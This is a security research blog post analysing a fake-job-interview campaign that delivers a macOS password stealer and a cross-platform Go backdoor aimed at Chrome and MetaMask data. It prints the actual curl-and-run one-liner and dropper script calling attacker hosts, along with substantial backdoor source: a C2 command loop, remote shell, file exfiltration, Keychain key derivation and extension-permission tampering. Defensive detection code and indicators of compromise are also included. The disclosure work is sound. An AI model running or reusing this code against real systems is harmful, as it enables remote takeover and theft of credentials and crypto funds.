Cybercrooks Are Using Fake Job Listings to Steal Crypto
2,662 reads

by Moonlock (by MacPaw) · 19 min read · 2025/02/13

Too Long; Didn't Read

An ongoing online campaign targets job seekers through fake interview websites and tricks them into installing a backdoor that is unremarkable in design but fully functional. Unlike sophisticated malware that relies on obfuscation, this attack relies on simplicity. Most worrying is its attempt to take over the permissions of the crypto-related Chrome extension MetaMask.

Written by the Moonlock Lab team at MacPaw


An ongoing online campaign targets job seekers through fake interview websites and tricks them into installing a backdoor that is unremarkable in design but fully functional. Unlike sophisticated malware that relies on obfuscation techniques, this attack relies on simplicity: it ships its source code alongside a Go binary, which makes it cross-platform. Most worrying is its attempt to take over the permissions of the crypto-related Chrome extension MetaMask, which could drain victims' wallets.


The campaign remains active, with new domains appearing all the time to lure more victims. Several independent security researchers and companies, such as SentinelOne, dmpdump, and ENKI WhiteHat, have published excellent analyses. Our team carried out an independent investigation, and in this article we share our findings and our hunting techniques.


The Moonlock Lab team began tracking this malware specifically on October 9, 2024, when the first components of the backdoor started to appear. A backdoor is a type of malicious software that hides on a system and lets threat actors execute commands remotely, as if they were the legitimate owners of the workstation. Such attacks typically use so-called C2 (Command and Control) servers to send and execute commands.


What distinguishes this attack from the ones we usually observe is that it is multi-stage and built to persist on the victim's machine, rather than relying on a single-shot data-theft flow. A complete summary of the attack stages can be seen in the image below.



The first well-organized thread on X that we noticed was posted by @tayvano_, who shared information about a potentially dangerous campaign aimed mainly at software developers looking for jobs at blockchain companies.


' Usually starts with a "recruiter" from a known company e.g. Kraken, MEXC, Gemini, Meta. Pay ranges + messaging style are enticing, even to people who aren't actively looking for a job. Mostly via LinkedIn. Also freelancer sites, job boards, tg, discord, etc.


To find the latest variants of this malware, it was essential to watch for new domains hosting the fake interview sites. For this purpose, our team relied on two constant indicators that these domains share:


  • The same URL pattern, "/video-questions/create/", followed by a hard-coded ID:

Source: urlscan.io

  • The same image (logo.png) on the pages:

Source: urlscan.io


Although some of the domains used during this campaign have been taken down, new ones keep appearing; the most recent one still online is smarthiretop[.]online. Our team has observed more than 20 such domains active since March 2024.

After investigating the domains, we found that some of them share a single IP address. This is common because attackers use bulletproof hosting providers that let many domains point at one server. Pointing multiple domains at one IP also lets the threat actors rotate domains without changing the backend infrastructure.

The malicious infrastructure is hosted on various services spread around the world. As shown on the map below, most of the servers are located in the US, with the rest scattered across other countries.


The malicious command that interviewees are asked to run is hidden in the pop-up that appears when visiting the malicious website. It is JS code, bundled in a file named main.39e5a388.js in this case. File names like this are typically produced by a hashing or fingerprinting step during the web application's build process (Source: https://urlscan.io/result/0ad23f64-4d61-49c8-8ed8-0d33a07419f4).


One of the pages contains this embedded JS file, with the following SHA256 hash:

  • f729af8473bf98f848ef2dde967d8d301fb71888ee3639142763ebb16914c803


Inside the bundled JS file we can easily see the same command that victims are asked to enter:


Once we understood how the threat actor distributes the malware, our main goal was to quickly find indicators and create signatures for our users. The first direct mention of "production-ready" samples and their hashes that we found was in this thread:

(embedded post 1873343968894689472)


It includes five hashes. Note that these are 40-hex-digit SHA-1 digests rather than SHA-256:

  • 96e78074218a0f272f7f94805cabde1ef8d64ffb *file.zip;
  • 86dea05a8f40cf3195e3a6056f2e968c861ed8f1 *nodejs.zip;
  • 321972e4e72c5364ec1d5b9e488d15c641fb1819 *nvidia-release.zip;
  • 3405469811bae511e62cb0a4062aadb523cad263 *VCam_arm64.zip;
  • c0baa450c5f3b6aacde2807642222f6d22d5b4bb *VCam_intel.zip.


In addition, our team began downloading the malicious scripts as if we had been tricked into doing so, just like the victims. At one point, the following command was used on the fake interview websites:

Command from the screenshot (do not run it!):

 sudo sh -c 'curl -k -o /var/tmp/ffmpeg.sh https://api.nvidia-release.org/ffmpeg-ar.sh && chmod +x /var/tmp/ffmpeg.sh && nohup bash /var/tmp/ffmpeg.sh >/dev/null 2>&1 &'


It performs the actions listed below:

  • Downloads the file ffmpeg-ar.sh from api[.]nvidia-release[.]org (curl -k, so the server's TLS certificate is not validated);
  • Saves it to /var/tmp/ffmpeg.sh and marks it executable;
  • Runs it detached with nohup, redirecting all output to /dev/null to hide it from the user.

Because the whole sequence is wrapped in sudo sh -c, the victim is prompted for their password once and the script runs with root privileges.


Inside the ffmpeg.sh file saved to the temporary folder, we find the entry point of this attack, which:

  • Downloads the second-stage ZIP file with the payload;
  • Writes a PLIST file and registers a launch agent for persistence;
  • Performs cleanup.


As we can see in the script below, it targets macOS specifically, both the Intel and the ARM variant. After determining the current CPU architecture, it downloads a ZIP archive containing multiple files. A more detailed analysis of this script can be found in this blog, as mentioned by SentinelOne in their recent report.

    #!/bin/bash

    # Define variables for URLs
    ZIP_URL_ARM64="https://api.nvidia-cloud.online/VCam1.update"
    ZIP_URL_INTEL="https://api.nvidia-cloud.online/VCam2.update"
    ZIP_FILE="/var/tmp/VCam.zip"         # Path to save the downloaded ZIP file
    WORK_DIR="/var/tmp/VCam"             # Temporary directory for extracted files
    EXECUTABLE="vcamservice.sh"          # Replace with the name of the executable file inside the ZIP
    APP="ChromeUpdateAlert.app"          # Replace with the name of the app to open
    PLIST_FILE=~/Library/LaunchAgents/com.vcam.plist  # Path to the plist file

    # Determine CPU architecture
    case $(uname -m) in
        arm64) ZIP_URL=$ZIP_URL_ARM64 ;;
        x86_64) ZIP_URL=$ZIP_URL_INTEL ;;
        *) exit 1 ;;  # Exit for unsupported architectures
    esac

    # Create working directory
    mkdir -p "$WORK_DIR"

    # Function to clean up
    cleanup() {
        rm -rf "$ZIP_FILE"
    }

    # Download, unzip, and execute
    if curl -s -o "$ZIP_FILE" "$ZIP_URL" && [[ -f "$ZIP_FILE" ]]; then
        unzip -o -qq "$ZIP_FILE" -d "$WORK_DIR"
        if [[ -f "$WORK_DIR/$EXECUTABLE" ]]; then
            chmod +x "$WORK_DIR/$EXECUTABLE"
        else
            cleanup
            exit 1
        fi
    else
        cleanup
        exit 1
    fi

    # Step 4: Register the service
    mkdir -p ~/Library/LaunchAgents
    cat > "$PLIST_FILE" <<EOL
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key>
        <string>com.vcam</string>
        <key>ProgramArguments</key>
        <array>
            <string>$WORK_DIR/$EXECUTABLE</string>
        </array>
        <key>RunAtLoad</key>
        <true/>
        <key>KeepAlive</key>
        <false/>
    </dict>
    </plist>
    EOL
    chmod 644 "$PLIST_FILE"

    if ! launchctl list | grep -q "com.vcam"; then
        launchctl load "$PLIST_FILE"
    fi

    # Step 5: Run ChromeUpdateAlert.app
    if [[ -d "$WORK_DIR/$APP" ]]; then
        open "$WORK_DIR/$APP" &
    fi

    # Final cleanup
    cleanup
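The persistence this script creates is easy to hunt for: a LaunchAgent whose ProgramArguments point into /var/tmp. The following Go program is an added example (not code from the original analysis or from the malware) that parses each plist in ~/Library/LaunchAgents and flags agents that execute from a temporary directory. SampleVCamPlist is a constructed copy of the heredoc above with $WORK_DIR/$EXECUTABLE expanded; it was not captured from an infected host. The prefix list and the Keychain-free XML walk are the author's own choices.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// Legitimate LaunchAgents practically never execute from these locations.
var suspiciousPrefixes = []string{"/var/tmp/", "/private/var/tmp/", "/tmp/", "/private/tmp/"}

// SampleVCamPlist is a constructed copy of the plist the dropper writes, with
// $WORK_DIR/$EXECUTABLE expanded; it was not captured from an infected host.
const SampleVCamPlist = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.vcam</string>
    <key>ProgramArguments</key>
    <array>
        <string>/var/tmp/VCam/vcamservice.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>`

// parseLaunchAgent extracts Label and ProgramArguments from plist XML. It walks
// the token stream because a plist dict is an ordered run of <key>/<value>
// pairs rather than a fixed struct that encoding/xml could unmarshal directly.
func parseLaunchAgent(r io.Reader) (string, []string, error) {
	dec := xml.NewDecoder(r)
	var label, cur, lastKey string
	var args []string
	inArgs := false
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return label, args, nil
		}
		if err != nil {
			return "", nil, err
		}
		switch t := tok.(type) {
		case xml.StartElement:
			cur = t.Name.Local
			if cur == "array" && lastKey == "ProgramArguments" {
				inArgs = true
			}
		case xml.EndElement:
			if t.Name.Local == "array" {
				inArgs = false
			}
			cur = ""
		case xml.CharData:
			text := strings.TrimSpace(string(t))
			switch {
			case text == "": // whitespace between elements
			case cur == "key":
				lastKey = text
			case cur == "string" && inArgs:
				args = append(args, text)
			case cur == "string" && lastKey == "Label":
				label = text
			}
		}
	}
}

// CheckPlist parses one LaunchAgent and returns its label and the first
// argument (the program itself or, e.g., a script handed to bash) that lives
// in a temporary directory; flagged is false for a clean agent.
func CheckPlist(r io.Reader) (label, program string, flagged bool, err error) {
	label, args, err := parseLaunchAgent(r)
	if err != nil {
		return "", "", false, err
	}
	for _, a := range args {
		for _, p := range suspiciousPrefixes {
			if strings.HasPrefix(a, p) {
				return label, a, true, nil
			}
		}
	}
	return label, "", false, nil
}

func main() {
	home, _ := os.UserHomeDir()
	paths, _ := filepath.Glob(filepath.Join(home, "Library", "LaunchAgents", "*.plist"))
	for _, p := range paths {
		f, err := os.Open(p)
		if err != nil {
			continue
		}
		label, program, flagged, perr := CheckPlist(f)
		f.Close()
		if perr == nil && flagged {
			fmt.Printf("%s: label %q executes %s from a temp directory\n", p, label, program)
		}
	}
}
```

Because the one-liner runs under sudo, also point the glob at /var/root/Library/LaunchAgents and /Library/LaunchAgents; a hit should be paired with a look at launchctl list for the com.vcam label and at the contents of /var/tmp/VCam.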



The contents of the archive (Intel CPU variant) that the script downloads are listed below:

All files in the archive can be divided into four groups:

  • Go source code components and their binaries (https://github.com/golang/go).
  • ChromeUpdateAlert.app – an app bundle containing a Mach-O binary that collects the user's IP address and password
  • The backdoor written in Go, together with the stealer
  • vcamservice.sh – a script that starts the main Go-based executable


Interestingly, the archive is about 75 MB in size, mostly because it bundles a large number of legitimate Go library components and binaries.

Analysis of the Mach-O Password Stealer

One of the files we have seen in use for a long time in this attack is a Mach-O universal binary with two architectures, named CameraAccess (SHA256: 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f4ebd5677e352c57e992a).


It disguises itself as Google Chrome, so that casual users believe the file is legitimate and hesitate to delete it.

The code is written in Swift, and we found no strong obfuscation techniques, which made the execution flow easy to follow.

It shows a window that looks like a system notification, asking the user to allow microphone access, supposedly requested by Google Chrome.

Even if the user chooses "Remind Me Later", the password prompt still appears.

The app claims it needs microphone access; however, it is sandboxed, and no real microphone permission request is ever made.

After the user enters their password, the malware requests the external IP address of the host it runs on. It then uploads a password.txt file to a Dropbox folder named after the user's external IP address.

In the screenshot below, the Dropbox API URL can be seen.

While examining the network traffic, we can see the attempt to obtain the victim's public IP address.

Once the IP address has been received, we can see requests to Dropbox that upload the IP/password pair using hard-coded credentials.

Our team reported this incident to Dropbox, along with the credentials used to run the abusive campaign.

Analysis of the Backdoor Written in Go

It is worth noting that the ZIP file downloaded by the ffmpeg.sh script contains the plain-text source code of the backdoor, which means it was neither pre-compiled nor obfuscated. This greatly sped up analysis but also raised questions about proper attribution: DPRK APT groups are usually far more sophisticated.


Another unusual trick is bundling the Go toolchain binary (/bin/go) in the archive instead of simply compiling the complete code. Since Go is not a standard tool on most operating systems, the threat actors may have included it for portability. This makes sense given that the malware is cross-platform and targets macOS, Linux, and Windows at the same time.


A graph showing the relationships between, and a detailed description of, each notable indicator can be found here.

Entry Point

Inside the archive there is a script called vcamupdate.sh. It runs immediately after unpacking and simply invokes /bin/go (bundled in the ZIP), passing it the path to the main Golang application (app.go in this case).

    #!/bin/bash
    # Set the working directory to the folder where this script is located
    cd "$(dirname "$0")"
    echo "Installing Dependencies..."
    project_file="app.go"
    ./bin/go run "$project_file"
    exit 0


The entry application (app.go) is responsible for generating a unique UUID for the user's workstation, initializing the C2 URL, and starting the main loop. In the code we can see single-line comments, debug message printing, and some commented-out code. It also contains URLs that were probably intended for testing and that the developers forgot to remove. Although the C2 IP address varies across the broader campaign, samples since 2024 have shared the same functionality and targeted the same data.


Next, the call to core.StartMainLoop(id, url) takes us to the core/ folder, which contains the files loop.go and work.go. The loop.go file is mainly responsible for receiving and executing commands from the C2, calling the submodules that collect valuable data, and uploading it to the remote server. It has many functions, eight of which we would like to highlight and examine in detail.

The StartMainLoop function

This function uses the config submodule to initialize the available commands and listens for incoming ones. Below is a table of all commands with their corresponding codes. A detailed analysis of the backdoor's functionality can be found in this publication.

Command name       Encoded name   Description
COMMAND_INFO       qwer           Get username, hostname, OS, arch
COMMAND_UPLOAD     asdf           Upload an arbitrary archive from the C2 to the host and decompress it
COMMAND_DOWNLOAD   zxcv           Download stolen data to the C2
COMMAND_OSSHELL    vbcx           Start a communication shell between host and C2 (execute arbitrary remote commands)
COMMAND_AUTO       r4ys           Automatically collect valuable data
COMMAND_WAIT       ghdj           Sleep for the requested duration
COMMAND_EXIT       dghh           Exit the main loop (set alive=false)

Depending on the command received from the C2, the corresponding function is called. Note the recover() in the loop body: any panic in a handler (for example a bad path in processDownload) resets the state to COMMAND_INFO and, after DURATION_ERROR_WAIT, the implant simply beacons again with a fresh INFO message rather than exiting.

    func StartMainLoop(id string, url string) {
        var (
            msg_type string
            msg_data [][]byte
            msg      string
            cmd      string
            cmd_type string
            cmd_data [][]byte
            alive    bool
        )

        // initialize
        cmd_type = config.COMMAND_INFO
        alive = true

        for alive {
            func() {
                // recover panic state
                defer func() {
                    if r := recover(); r != nil {
                        cmd_type = config.COMMAND_INFO
                        time.Sleep(config.DURATION_ERROR_WAIT)
                    }
                }()

                switch cmd_type {
                case config.COMMAND_INFO:
                    msg_type, msg_data = processInfo()
                case config.COMMAND_UPLOAD:
                    msg_type, msg_data = processUpload(cmd_data)
                case config.COMMAND_DOWNLOAD:
                    msg_type, msg_data = processDownload(cmd_data)
                case config.COMMAND_OSSHELL:
                    msg_type, msg_data = processOsShell(cmd_data)
                case config.COMMAND_AUTO:
                    msg_type, msg_data = processAuto(cmd_data)
                case config.COMMAND_WAIT:
                    msg_type, msg_data = processWait(cmd_data)
                case config.COMMAND_EXIT:
                    alive = false
                    msg_type, msg_data = processExit()
                default:
                    panic("problem")
                }

                // encode the result, exchange it with the C2 and decode the next command
                msg = command.MakeMsg(id, msg_type, msg_data)
                cmd, _ = transport.HtxpExchange(url, msg)
                cmd_type, cmd_data = command.DecodeMsg(cmd)
            }()
        }
    }

The processInfo function

This function collects basic system information: username, hostname, OS name (runtime.GOOS), and architecture. It is worth noting that most well-known infostealers collect far more system information than this malware does.

    func processInfo() (string, [][]byte) {
        user, _ := user.Current()
        host, _ := os.Hostname()
        os := runtime.GOOS
        arch := runtime.GOARCH
        print("user: " + user.Username + ", host: " + host + ", os: " + os + ", arch: " + arch + "\n")
        data := [][]byte{
            []byte(user.Username),
            []byte(host),
            []byte(os),
            []byte(arch),
            []byte(config.DAEMON_VERSION),
        }
        return config.MSG_INFO, data
    }

The processUpload function

In this context, "upload" means sending an archive from the C2 to the compromised host, followed by its decompression to the path the C2 specifies. The function reports back whether the decompression succeeded.

    func processUpload(data [][]byte) (string, [][]byte) {
        var log string
        var state string

        path := string(data[0])
        buf := bytes.NewBuffer(data[1])
        err := util.Decompress(buf, path)
        if err == nil {
            log = fmt.Sprintf("%s : %d", path, len(data[1]))
            state = config.LOG_SUCCESS
        } else {
            log = fmt.Sprintf("%s : %s", path, err.Error())
            state = config.LOG_FAIL
        }
        return config.MSG_LOG, [][]byte{
            []byte(state),
            []byte(log),
        }
    }

The processDownload function

This function is the reverse of the previous one. It reads the requested file, or, if the path is a directory, first packs it into a tar.gz archive, and returns the contents to the C2. Note that the error from os.Stat is discarded, so a nonexistent path makes info.IsDir() panic on a nil value; the recover in StartMainLoop absorbs that.

    func processDownload(data [][]byte) (string, [][]byte) {
        var file_data []byte
        var err error

        path := string(data[0])
        _, file := filepath.Split(path)
        info, _ := os.Stat(path)
        if info.IsDir() {
            var buf bytes.Buffer
            err = util.Compress(&buf, []string{path}, false)
            file = fmt.Sprintf("%s.tar.gz", file)
            file_data = buf.Bytes()
        } else {
            file_data, err = os.ReadFile(path)
        }

        if err == nil {
            return config.MSG_FILE, [][]byte{[]byte(config.LOG_SUCCESS), []byte(file), file_data}
        } else {
            return config.MSG_FILE, [][]byte{[]byte(config.LOG_FAIL), []byte(err.Error())}
        }
    }

The processOsShell function

This is the function a real backdoor must have. It expects an arbitrary command and attempts to execute it. The command may carry command-line arguments, and its output is fed straight back to the C2. There are two modes: "wait and get output", which runs the command under a context timeout and returns its stdout, and "start and detach", which merely starts the process. The timeout is parsed from a hexadecimal string and passed to time.Duration unscaled, so the C2 must express it in nanoseconds.

    func processOsShell(data [][]byte) (string, [][]byte) {
        mode := string(data[0]) // mode
        timeout, _ := strconv.ParseInt(string(data[1]), 16, 64)
        shell := string(data[2])
        args := make([]string, len(data[3:]))
        for index, elem := range data[3:] {
            args[index] = string(elem)
        }

        if mode == config.SHELL_MODE_WAITGETOUT { // wait and get result mode
            ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout))
            defer cancel()
            cmd := exec.CommandContext(ctx, shell, args...)
            out, err := cmd.Output()
            if err != nil {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_FAIL),
                    []byte(err.Error()),
                }
            } else {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_SUCCESS),
                    out,
                }
            }
        } else { // start and detach mode
            c := exec.Command(shell, args...)
            err := c.Start()
            if err != nil {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_FAIL),
                    []byte(err.Error()),
                }
            } else {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_SUCCESS),
                    []byte(fmt.Sprintf("%s %s", shell, strings.Join(args, " "))),
                }
            }
        }
    }

The processAuto function

This is the entry point of the stealing flow. The function dispatches to the files in the auto/ folder, which contain grabbers, processors, or modifiers for the following data:

  • Keychain
  • Chrome login data
  • Chrome cookies
  • The Chrome MetaMask extension (keys, permissions, etc.)
  • Chrome configuration
    func processAuto(data [][]byte) (string, [][]byte) {
        var (
            msg_type string
            msg_data [][]byte
        )
        mode := string(data[0])
        switch mode {
        case config.AUTO_CHROME_GATHER:
            msg_type, msg_data = auto.AutoModeChromeGather()
        case config.AUTO_CHROME_PREFRST:
            msg_type, msg_data = auto.AutoModeChromeChangeProfile()
        case config.AUTO_CHROME_COOKIE:
            msg_type, msg_data = auto.AutoModeChromeCookie()
        case config.AUTO_CHROME_KEYCHAIN:
            msg_type, msg_data = auto.AutoModeMacChromeLoginData()
        default:
            msg_type = config.MSG_LOG
            msg_data = [][]byte{[]byte(config.LOG_FAIL), []byte("unknown auto mode")}
        }
        return msg_type, msg_data
    }

The processWait function

A service function that puts the backdoor to sleep while it waits for further commands, then answers with 128 random bytes as a ping. As in processOsShell, the value is parsed as hexadecimal and handed to time.Duration without scaling, so it is interpreted in nanoseconds: a C2 that wants the implant to sleep for X seconds has to send X * 1e9 encoded in hex.

    func processWait(data [][]byte) (string, [][]byte) {
        duration, _ := strconv.ParseInt(string(data[0]), 16, 64)
        time.Sleep(time.Duration(duration))
        send_data := make([]byte, 128)
        rand.Read(send_data)
        return config.MSG_PING, [][]byte{send_data}
    }

The processExit function

A service function used to leave the main C2 communication loop.

    func processExit() (string, [][]byte) {
        return config.MSG_LOG, [][]byte{
            []byte(config.LOG_SUCCESS),
            []byte("exited"),
        }
    }

Implementation of the automatic Chrome data collection

The auto/ folder contains a set of Go files:

  • basic.go

     const (
         userdata_dir_win       = "AppData\\Local\\Google\\Chrome\\User Data\\"
         userdata_dir_darwin    = "Library/Application Support/Google/Chrome/"
         userdata_dir_linux     = ".config/google-chrome"
         extension_dir          = "nkbihfbeogaeaoehlefnkodbefgpgknn"
         extension_hash_key     = "protection.macs.extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn"
         extension_setting_key  = "extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn"
         secure_preference_file = "Secure Preferences"
         logins_data_file       = "Login Data"
         keychain_dir_darwin    = "Library/Keychains/login.keychain-db"
     )
    • Here we see the constants that define the targeted data; it is clear that the main focus is the MetaMask extension (Web Store ID nkbihfbeogaeaoehlefnkodbefgpgknn). Note that alongside the settings key, the backdoor also knows the matching protection.macs key, which is where Chrome keeps the integrity MAC for that preference.
  • chrome_change_profile.go

     // get json string
     func getExtJsonString() string {
         return `{
       "active_permissions": {
         "api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"],
         "explicit_host": ["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"],
         "manifest_permissions": [],
         "scriptable_host": ["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]
       },
       "commands": {"_execute_browser_action": {"suggested_key": "Alt+Shift+M", "was_assigned": true}},
       "content_settings": [],
       "creation_flags": 38,
       "events": [],
       "first_install_time": "13361518520188298",
       "from_webstore": false,
       "granted_permissions": {
         "api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"],
         "explicit_host": ["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"],
         "manifest_permissions": [],
         "scriptable_host": ["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]
       },
       "incognito_content_settings": [],
       "incognito_preferences": {},
       "last_update_time": "13361518520188298",
       "location": 4,
       "newAllowFileAccess": true,
       "path": "C:\\ProgramData\\11.16.0_0",
       "preferences": {},
       "regular_only_preferences": {},
       "state": 1,
       "was_installed_by_default": false,
       "was_installed_by_oem": false,
       "withholding_permissions": false
     }`
     }

     // chrome kill
     if runtime.GOOS == "windows" {
         cmd := exec.Command("cmd", "/c", "taskkill /f /im chrome.exe")
         cmd.Run()
     } else {
         cmd := exec.Command("/bin/sh", "-c", "killall chrome")
         cmd.Run()
     }
    • It kills all running Chrome processes (so that Chrome does not overwrite the edited preferences on exit) and then modifies the settings of the MetaMask extension. On macOS the browser process is named "Google Chrome", so killall chrome does not match it there.
    • The JSON it writes describes an extension that would be dangerous to trust, because of its broad permissions and the signs of manual installation.
    • The "webRequest" permission lets an extension observe and act on network requests, which can support data theft or phishing. The "clipboardWrite" permission lets it overwrite clipboard contents, which is enough to swap a copied cryptocurrency address (reading the clipboard would require clipboardRead).
    • The "scriptable_host" field, which includes "file:///*", "https://*/*", and "http://*/*", allows scripts to run on every website and, together with newAllowFileAccess, on local files, enabling credential theft or unauthorized data exfiltration.
    • The "explicit_host" field grants access to crypto-related domains such as https://*.infura.io/* and https://*.cx.metamask.io/*, which could be used to manipulate transactions. These are the hosts the genuine MetaMask manifest itself requests, so the tampering shows in the provenance fields rather than in the host list.
    • The "from_webstore": false field indicates that the extension was installed manually or through unsanctioned means, and the absolute "path" outside the profile's Extensions directory points the same way. The "commands" field assigns a keyboard shortcut that activates the extension, which could trigger hidden malicious behavior.
    • Taken together, these settings show that the extension entry could be used for unauthorized access, data theft, or financial fraud.
  • chrome_cookie_darwin.go
     var (
         SALT       = "saltysalt"
         ITERATIONS = 1003
         KEYLENGTH  = 16
     )

     func getDerivedKey() ([]byte, error) {
         out, err := exec.Command(
             `/usr/bin/security`, `find-generic-password`, `-s`, `Chrome Safe Storage`, `-wa`, `Chrome`,
         ).Output()
         if err != nil {
             return nil, err
         }
         temp := []byte(strings.TrimSpace(string(out)))
         chromeSecret := temp[:len(temp)-1]
         if chromeSecret == nil {
             return nil, errors.New("Can not get keychain")
         }
         var chromeSalt = []byte("saltysalt")
         // @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
         key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New)
         return key, nil
     }
    • Used to retrieve the "Chrome Safe Storage" password from the local Keychain and derive Chrome's cookie/password encryption key from it (PBKDF2-SHA1, salt "saltysalt", 1003 iterations, 16-byte key). On macOS this security call normally triggers a Keychain authorization dialog that asks for the login password, which is one reason the password phished by CameraAccess is valuable to the operator.
    • Collects Keychain data and other storage into gatherchain.tar.gz.
  • chrome_cookie_linux.go

    • The same, for Linux.
  • chrome_cookie_windows.go

    • The same, for Windows.
  • chrome_gather.go
     func AutoModeChromeGather() (string, [][]byte) {
         print("=========== AutoModeChromeGather ===========", runtime.GOOS, "\n")
         var (
             buf          bytes.Buffer
             userdata_dir string
             path_list    []string
         )

         // gather
         userdata_dir = getUserdataDir()
         // file system search
         _ = filepath.Walk(userdata_dir, func(path string, info os.FileInfo, err error) error {
             if info.Name() == extension_dir && strings.Contains(path, "Local Extension Settings") {
                 path_list = append(path_list, path)
             }
             return nil
         })
         _ = util.Compress(&buf, path_list, true)
         print("=========== End ===========\n")

         // return
         data := make([][]byte, 3)
         data[0] = []byte(config.LOG_SUCCESS)
         data[1] = []byte("gather.tar.gz")
         data[2] = buf.Bytes()
         msg_type := config.MSG_FILE
         return msg_type, data
     }
    • Collects the extension's local settings (if present on the system) and packs them into gather.tar.gz.
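A defender can check for the rewrite that chrome_change_profile.go performs by reading the profile's Secure Preferences file and comparing the MetaMask entry's provenance fields against what a Web Store install looks like. The Go program below is an added example (not code from the page or from the malware). SampleSecurePreferences is constructed: its MetaMask entry carries the values from getExtJsonString() above, while the nested extensions/settings layout is assumed from how Chromium stores this file. The choice of indicators, the absPath pattern and the reading of location 4 as Chromium's kUnpacked manifest location are the author's; pass the path of a real "Secure Preferences" file as the first argument to scan a profile.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"regexp"
)

// MetaMaskID is the Web Store ID that the backdoor's basic.go targets.
const MetaMaskID = "nkbihfbeogaeaoehlefnkodbefgpgknn"

// SampleSecurePreferences is a constructed excerpt of a "Secure Preferences"
// file whose MetaMask entry holds the values the backdoor writes. The nested
// layout is assumed from Chromium; nothing here was captured from a victim.
const SampleSecurePreferences = `{
  "extensions": {"settings": {"nkbihfbeogaeaoehlefnkodbefgpgknn": {
    "from_webstore": false,
    "newAllowFileAccess": true,
    "location": 4,
    "path": "C:\\ProgramData\\11.16.0_0",
    "state": 1,
    "granted_permissions": {
      "api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"],
      "scriptable_host": ["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]
    }
  }}}
}`

// Web Store installs record a path relative to the profile's Extensions
// directory; an absolute path (POSIX or Windows drive) means a side-load.
var absPath = regexp.MustCompile(`^(/|[A-Za-z]:\\)`)

// ExtensionFindings returns the tamper indicators present in one extension's
// settings entry. A clean Web Store install has from_webstore=true, no file://
// access, a relative path and no file:///* content-script host.
func ExtensionFindings(entry map[string]any) []string {
	var out []string
	if v, ok := entry["from_webstore"].(bool); ok && !v {
		out = append(out, "from_webstore is false")
	}
	if v, ok := entry["newAllowFileAccess"].(bool); ok && v {
		out = append(out, "newAllowFileAccess is true")
	}
	if p, ok := entry["path"].(string); ok && absPath.MatchString(p) {
		out = append(out, "path is absolute, outside the profile: "+p)
	}
	// 4 is ManifestLocation kUnpacked in Chromium (author's reading of the enum).
	if v, ok := entry["location"].(float64); ok && v == 4 {
		out = append(out, "location 4 (unpacked, i.e. side-loaded)")
	}
	if gp, ok := entry["granted_permissions"].(map[string]any); ok {
		if hosts, ok := gp["scriptable_host"].([]any); ok {
			for _, h := range hosts {
				if s, _ := h.(string); s == "file:///*" {
					out = append(out, "content scripts allowed on file:///*")
				}
			}
		}
	}
	return out
}

// CheckSecurePreferences parses a Secure Preferences document and inspects the
// entry for extID. A missing entry means the extension is not installed; that
// yields nil findings and no error.
func CheckSecurePreferences(raw []byte, extID string) ([]string, error) {
	var prefs struct {
		Extensions struct {
			Settings map[string]map[string]any `json:"settings"`
		} `json:"extensions"`
	}
	if err := json.Unmarshal(raw, &prefs); err != nil {
		return nil, err
	}
	entry, ok := prefs.Extensions.Settings[extID]
	if !ok {
		return nil, nil
	}
	return ExtensionFindings(entry), nil
}

func main() {
	raw := []byte(SampleSecurePreferences)
	if len(os.Args) > 1 { // e.g. "~/Library/Application Support/Google/Chrome/Default/Secure Preferences"
		b, err := os.ReadFile(os.Args[1])
		if err != nil {
			fmt.Println("read failed:", err)
			return
		}
		raw = b
	}
	findings, err := CheckSecurePreferences(raw, MetaMaskID)
	if err != nil {
		fmt.Println("parse failed:", err)
		return
	}
	if len(findings) == 0 {
		fmt.Println("MetaMask entry absent or consistent with a Web Store install")
	}
	for _, f := range findings {
		fmt.Println("tamper indicator:", f)
	}
}
```

Do not rely on Chrome's own integrity check here: basic.go also carries the protection.macs key for this entry, so the backdoor can rewrite the MAC along with the settings, and a MAC that validates says nothing about whether the entry was touched.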

Conclusion

To wrap up our analysis, we should highlight the most important points:

  • After a successful password theft, the victim's workstation can be accessed remotely through the C2 to steal far more data, including personal files stored on the system. This makes this malware far more dangerous than conventional stealers, which typically run once and collect only the files on their list.
  • The backdoor's code is written according to good programming practices and the comments are left in place, which leaves open the question of why the code was not pre-compiled.
  • Only one crypto-related extension is targeted, possibly because the operators count on remote access to search the system manually for other popular crypto tools and valuable data.
  • The campaign is still ongoing, which shows that the threat actors' tactics keep working and do not require rapid change. Nevertheless, we expect similar efforts with updated tooling to appear soon.

IOC

Domains

 app.blockchain-checkup[.]com
 app.hiring-interview[.]com
